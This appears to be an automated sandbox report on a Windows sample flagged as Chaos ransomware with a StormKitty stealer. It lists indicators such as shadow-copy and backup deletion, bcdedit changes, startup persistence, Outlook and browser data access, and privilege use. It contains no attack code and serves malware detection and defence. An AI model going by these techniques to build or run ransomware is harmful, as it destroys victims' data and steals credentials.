Malware Analysis Report

2025-04-13 21:19

Sample ID 250322-glcccayxds
Target ZGZ3X_nig.exe
SHA256 568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8
Tags
chaos stormkitty collection defense_evasion discovery evasion execution impact persistence privilege_escalation ransomware spyware stealer upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8

Threat Level: Known bad

The file ZGZ3X_nig.exe was found to be: Known bad.

Malicious Activity Summary

chaos stormkitty collection defense_evasion discovery evasion execution impact persistence privilege_escalation ransomware spyware stealer upx

Stormkitty family

Chaos Ransomware

Chaos

StormKitty payload

StormKitty

Chaos family

Modifies boot configuration data using bcdedit

Deletes shadow copies

Blocklisted process makes network request

Deletes backup catalog

Downloads MZ/PE file

Disables Task Manager via registry modification

Checks computer location settings

Drops startup file

Executes dropped EXE

Reads user/profile data of web browsers

Drops desktop.ini file(s)

Looks up external IP address via web service

Accesses Microsoft Outlook profiles

Command and Scripting Interpreter: PowerShell

UPX packed file

Sets desktop wallpaper using registry

Hide Artifacts: Ignore Process Interrupts

Unsigned PE

Program crash

Browser Information Discovery

Enumerates physical storage devices

System Network Configuration Discovery: Wi-Fi Discovery

Event Triggered Execution: Netsh Helper DLL

System Location Discovery: System Language Discovery

Interacts with shadow copies

Runs net.exe

Checks SCSI registry key(s)

Suspicious behavior: AddClipboardFormatListener

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

outlook_office_path

outlook_win_path

Checks processor information in registry

Modifies registry class

Opens file in notepad (likely ransom note)

Uses Volume Shadow Copy service COM API

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-03-22 05:53

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2025-03-22 05:53

Reported

2025-03-22 05:55

Platform

win10v2004-20250314-en

Max time kernel

93s

Max time network

132s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe"

Signatures

Chaos

ransomware chaos

Chaos Ransomware

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Chaos family

chaos

StormKitty

stealer stormkitty

StormKitty payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Stormkitty family

stormkitty

Deletes shadow copies

ransomware defense_evasion impact execution

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Deletes backup catalog

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Disables Task Manager via registry modification

defense_evasion

Downloads MZ/PE file

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\build.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\svchost.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\readme.txt C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.url C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Public\Downloads\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Public\Libraries\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Favorites\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\OneDrive\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Contacts\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Links\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Public\AccountPictures\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Saved Games\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Public\Music\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Public\Pictures\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Music\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\3D Objects\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn1\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Public\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Public\Desktop\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Public\Documents\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Public\Videos\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification F:\$RECYCLE.BIN\S-1-5-21-3218366390-1258052702-4267193707-1000\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2ygajis2g.jpg" C:\Users\Admin\AppData\Roaming\svchost.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Hide Artifacts: Ignore Process Interrupts

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\kernelv.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\System32\vds.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\System32\vds.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Windows\System32\vds.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Windows\System32\vds.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000_Classes\Local Settings C:\Users\Admin\AppData\Roaming\svchost.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Runs net.exe

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbengine.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1868 wrote to memory of 1420 N/A C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe C:\Windows\system32\cmd.exe
PID 1868 wrote to memory of 1420 N/A C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe C:\Windows\system32\cmd.exe
PID 1420 wrote to memory of 2348 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1420 wrote to memory of 2348 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2348 wrote to memory of 1872 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
